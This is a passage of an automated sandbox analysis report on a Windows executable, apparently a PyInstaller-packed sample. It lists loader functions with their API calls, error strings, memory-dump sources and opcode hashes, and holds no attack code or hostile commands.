588->589 589->578 592 7ff7f3dd13f5-7ff7f3dd13f8 589->592 595 7ff7f3dd140c-7ff7f3dd140f 592->595 596 7ff7f3dd13fa-7ff7f3dd13fd 592->596 597 7ff7f3dd13c3-7ff7f3dd13cd call 7ff7f3de0110 593->597 598 7ff7f3dd13cf-7ff7f3dd13d2 593->598 595->567 596->581 599 7ff7f3dd13ff-7ff7f3dd1407 596->599 597->589 597->598 598->581 599->560
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                      • API String ID: 2050909247-2813020118
                                                                                      • Opcode ID: 698b21169e7bd12c857e57f237555d9e116291535cd7e4395843bf29195d2337
                                                                                      • Instruction ID: d1f98d6a146640630b6d44f97480d82eaf7043d5bf68b8ae6c1c38cafc661599
                                                                                      • Opcode Fuzzy Hash: 698b21169e7bd12c857e57f237555d9e116291535cd7e4395843bf29195d2337
                                                                                      • Instruction Fuzzy Hash: F3510622A0964341EBE4BBA1A4403BAB691FF44794FC44135ED6D6B7C5DE3CE441C790
                                                                                      Function 00007FF7F3DD36B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetModuleFileNameW.KERNEL32(?,00007FF7F3DD3804), ref: 00007FF7F3DD36E1
                                                                                      • GetLastError.KERNEL32(?,00007FF7F3DD3804), ref: 00007FF7F3DD36EB
                                                                                        • Part of subcall function 00007FF7F3DD2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2C9E
                                                                                        • Part of subcall function 00007FF7F3DD2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F3DD3706,?,00007FF7F3DD3804), ref: 00007FF7F3DD2D63
                                                                                        • Part of subcall function 00007FF7F3DD2C50: MessageBoxW.USER32 ref: 00007FF7F3DD2D99
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                      • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                      • API String ID: 3187769757-2863816727
                                                                                      • Opcode ID: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                      • Instruction ID: 6e3e81b34d53e10b69dc84d0416274b69e031a06a4304550f486cd0837dcf434
                                                                                      • Opcode Fuzzy Hash: 7a7bb6314ef99d1ea6b5a99dff4d55fbb7227be169d5ba9e119ffda366a0a745
                                                                                      • Instruction Fuzzy Hash: AC216251B18A4291FBA0B764E8513B6F250BF88394FC00231E57DAA5D9EE2CE505C7A0
                                                                                      Function 00007FF7F3DEBA5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 701 7ff7f3deba5c-7ff7f3deba82 702 7ff7f3deba84-7ff7f3deba98 call 7ff7f3de4ee8 call 7ff7f3de4f08 701->702 703 7ff7f3deba9d-7ff7f3debaa1 701->703 721 7ff7f3debe8e 702->721 705 7ff7f3debe77-7ff7f3debe83 call 7ff7f3de4ee8 call 7ff7f3de4f08 703->705 706 7ff7f3debaa7-7ff7f3debaae 703->706 723 7ff7f3debe89 call 7ff7f3dea8e0 705->723 706->705 708 7ff7f3debab4-7ff7f3debae2 706->708 708->705 711 7ff7f3debae8-7ff7f3debaef 708->711 715 7ff7f3debaf1-7ff7f3debb03 call 7ff7f3de4ee8 call 7ff7f3de4f08 711->715 716 7ff7f3debb08-7ff7f3debb0b 711->716 715->723 719 7ff7f3debe73-7ff7f3debe75 716->719 720 7ff7f3debb11-7ff7f3debb17 716->720 724 7ff7f3debe91-7ff7f3debea8 719->724 720->719 725 7ff7f3debb1d-7ff7f3debb20 720->725 721->724 723->721 725->715 728 7ff7f3debb22-7ff7f3debb47 725->728 730 7ff7f3debb49-7ff7f3debb4b 728->730 731 7ff7f3debb7a-7ff7f3debb81 728->731 734 7ff7f3debb72-7ff7f3debb78 730->734 735 7ff7f3debb4d-7ff7f3debb54 730->735 732 7ff7f3debb56-7ff7f3debb6d call 7ff7f3de4ee8 call 7ff7f3de4f08 call 7ff7f3dea8e0 731->732 733 7ff7f3debb83-7ff7f3debb8f call 7ff7f3ded5fc 731->733 762 7ff7f3debd00 732->762 741 7ff7f3debb94-7ff7f3debbab call 7ff7f3dea948 * 2 733->741 736 7ff7f3debbf8-7ff7f3debc0f 734->736 735->732 735->734 739 7ff7f3debc11-7ff7f3debc19 736->739 740 7ff7f3debc8a-7ff7f3debc94 call 7ff7f3df391c 736->740 739->740 743 7ff7f3debc1b-7ff7f3debc1d 739->743 753 7ff7f3debd1e 740->753 754 7ff7f3debc9a-7ff7f3debcaf 740->754 764 7ff7f3debbad-7ff7f3debbc3 call 7ff7f3de4f08 call 7ff7f3de4ee8 741->764 765 7ff7f3debbc8-7ff7f3debbf3 call 7ff7f3dec284 741->765 743->740 747 7ff7f3debc1f-7ff7f3debc35 743->747 747->740 751 7ff7f3debc37-7ff7f3debc43 747->751 751->740 758 7ff7f3debc45-7ff7f3debc47 751->758 760 7ff7f3debd23-7ff7f3debd43 ReadFile 753->760 754->753 756 7ff7f3debcb1-7ff7f3debcc3 GetConsoleMode 754->756 756->753 761 7ff7f3debcc5-7ff7f3debccd 756->761 758->740 763 7ff7f3debc49-7ff7f3debc61 758->763 766 7ff7f3debe3d-7ff7f3debe46 GetLastError 760->766 767 7ff7f3debd49-7ff7f3debd51 760->767 761->760 769 7ff7f3debccf-7ff7f3debcf1 ReadConsoleW 761->769 772 7ff7f3debd03-7ff7f3debd0d call 7ff7f3dea948 762->772 763->740 773 7ff7f3debc63-7ff7f3debc6f 763->773 764->762 765->736 770 7ff7f3debe63-7ff7f3debe66 766->770 771 7ff7f3debe48-7ff7f3debe5e call 7ff7f3de4f08 call 7ff7f3de4ee8 766->771 767->766 775 7ff7f3debd57 767->775 777 7ff7f3debcf3 GetLastError 769->777 778 7ff7f3debd12-7ff7f3debd1c 769->778 782 7ff7f3debe6c-7ff7f3debe6e 770->782 783 7ff7f3debcf9-7ff7f3debcfb call 7ff7f3de4e7c 770->783 771->762 772->724 773->740 781 7ff7f3debc71-7ff7f3debc73 773->781 785 7ff7f3debd5e-7ff7f3debd73 775->785 777->783 778->785 781->740 790 7ff7f3debc75-7ff7f3debc85 781->790 782->772 783->762 785->772 786 7ff7f3debd75-7ff7f3debd80 785->786 792 7ff7f3debd82-7ff7f3debd9b call 7ff7f3deb674 786->792 793 7ff7f3debda7-7ff7f3debdaf 786->793 790->740 801 7ff7f3debda0-7ff7f3debda2 792->801 797 7ff7f3debdb1-7ff7f3debdc3 793->797 798 7ff7f3debe2b-7ff7f3debe38 call 7ff7f3deb4b4 793->798 802 7ff7f3debdc5 797->802 803 7ff7f3debe1e-7ff7f3debe26 797->803 798->801 801->772 805 7ff7f3debdca-7ff7f3debdd1 802->805 803->772 806 7ff7f3debdd3-7ff7f3debdd7 805->806 807 7ff7f3debe0d-7ff7f3debe18 805->807 808 7ff7f3debdf3 806->808 809 7ff7f3debdd9-7ff7f3debde0 806->809 807->803 811 7ff7f3debdf9-7ff7f3debe09 808->811 809->808 810 7ff7f3debde2-7ff7f3debde6 809->810 810->808 812 7ff7f3debde8-7ff7f3debdf1 810->812 811->805 813 7ff7f3debe0b 811->813 812->811 813->803
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                      • Instruction ID: 2ae60ac12aab64c9a0cb1b4a75a229ac41baac33c10c3e2c4ddd982db18a7b32
                                                                                      • Opcode Fuzzy Hash: c3f57b6cd1f658b3a1cfdd45bc75f21d2f6c8be166295f0eb40444005b392bd6
                                                                                      • Instruction Fuzzy Hash: EDC1092290D68741E7E96B9594402BDBF50FB81B80FD54231EE6E2B3D1CE7CF48587A2
                                                                                      Function 00007FF7F3DD6360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                      • API String ID: 2050909247-2434346643
                                                                                      • Opcode ID: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                      • Instruction ID: 2e98aeb31ad3609f410d40d03e7cd1250b60627e667e6268e44fecb39f8131b8
                                                                                      • Opcode Fuzzy Hash: 111e0a7e53993944da2df5d9c96cd3a7cea32e86f931b773c4ccd6a62d35c348
                                                                                      • Instruction Fuzzy Hash: C5414221A1C68691EBA1EBA0E4552E9B321FF44384FC00132EA7D6B6D9DF3CE515C7E0
                                                                                      Function 00007FF7F3DD2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                      • String ID: Unhandled exception in script
                                                                                      • API String ID: 3081866767-2699770090
                                                                                      • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                      • Instruction ID: 7e6a71673e423b3a4212b38f906b364629daf10781857dc4f7c35500625a236b
                                                                                      • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                      • Instruction Fuzzy Hash: 03319272619A8285EBA4EBB1E8542F9B360FF88784F840135EE5D5BB89DF3CD141C750
                                                                                      Function 00007FF7F3DE5628 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 1279662727-0
                                                                                      • Opcode ID: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                      • Instruction ID: 714d68a3b1f627837104b0eeca460a53cc4737b17a2adef9702c5448021356c5
                                                                                      • Opcode Fuzzy Hash: b1746a8a916bbf96797ffba89da9809a683c49b2a7b1d8f7dd6efe5c63c8eb6a
                                                                                      • Instruction Fuzzy Hash: C641DB22D1878283E398ABA09550379B761FB947A4F508334E67C17AD1DF7CE4E087A1
                                                                                      Function 00007FF7F3DD20C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                      • String ID:
                                                                                      • API String ID: 1956198572-0
                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                      • Instruction ID: 8dc9915a568aecbff456bd31e0ccc7e5903359a763709003c2c4f3c359694f84
                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                      • Instruction Fuzzy Hash: 40118621A1C54682F7D4A7F9F684279A351EB84784FC88030DE691BBDDCD2DD5D98250
                                                                                      Function 00007FF7F3DDCC3C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                      • String ID:
                                                                                      • API String ID: 3251591375-0
                                                                                      • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                      • Instruction ID: 2d1483e0e7626e00bd2ea0e0d71504a7b278995b90a41101671c79cd4546b98d
                                                                                      • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                      • Instruction Fuzzy Hash: 4E314E20E0914341FFD4BBF598513B9B6819F41788FC44134EA2E6F2DBDE2CA44A82F1
                                                                                      Function 00007FF7F3DE013C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                      • Instruction ID: 6165f8212c5dfa928c3ec2d0f3d1e5d033899bd9e9cf81c847d43f4ef5a5fe5e
                                                                                      • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                      • Instruction Fuzzy Hash: E251FC21B0924186E7ACBAE7940067AE991BF44BA4F884734DD7D6F7C5CE3CD481C6B2
                                                                                      Function 00007FF7F3DEC134 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastPointer
                                                                                      • String ID:
                                                                                      • API String ID: 2976181284-0
                                                                                      • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                      • Instruction ID: 5c76688e600b584057507513bfef81433e2cd7577ee3d0ae3c97f81b026e4a56
                                                                                      • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                      • Instruction Fuzzy Hash: 8B110122B08B8281DBA4AB65A840169F761AB45FF0F944331EE7D1F7E8CE7CD0948781
                                                                                      Function 00007FF7F3DEAB58 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF7F3DEA9D5,?,?,00000000,00007FF7F3DEAA8A), ref: 00007FF7F3DEABC6
                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF7F3DEA9D5,?,?,00000000,00007FF7F3DEAA8A), ref: 00007FF7F3DEABD0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseErrorHandleLast
                                                                                      • String ID:
                                                                                      • API String ID: 918212764-0
                                                                                      • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                      • Instruction ID: 9f08c8840a6c9606848a49971f907b8bca6f74ac38dad4e15623bbf5e44a626c
                                                                                      • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                      • Instruction Fuzzy Hash: 0E21F610B1869341FBDD77E19480379AA929F84BA0F844339E93E6F7C1CE6CA4C143A2
                                                                                      Function 00007FF7F3DEBEAC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID:
                                                                                      • API String ID: 3215553584-0
                                                                                      • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                      • Instruction ID: 6b70df8f31d8af1651971ab991e3c8b8c6c7454f081e529a6d60c38adaf927b3
                                                                                      • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                      • Instruction Fuzzy Hash: 8D41DC3291D24147EBBCABA5A540179FB60EB55B40F500331DAAE5B6D1CF2DF482CBB2
                                                                                      Function 00007FF7F3DD7F90 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.2974763990.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.2974750102.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974787730.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974807992.00007FF7F3E11000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.2974838238.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _fread_nolock
                                                                                      • String ID:
                                                                                      • API String ID: 840049012-0
                                                                                      • Opcode ID: 4900000118834b7d6e4087b4962dc8428ce36fa7a7de64a54251ee196edfec95
                                                                                      • Instruction ID: efa39872125dee99157335fe45bcaf478e737cba8b045686d1e1c1bdc4d491cf
                                                                                      • Opcode Fuzzy Hash: 4900000118834b7d6e4087b4962dc8428ce36fa7a7de64a54251ee196edfec95
                                                                                      • Instruction Fuzzy Hash: 3821A021B1875246EB95BAA278047BAE651BF45BC4FCC4430EE2D2F7C6CE7DE051C291
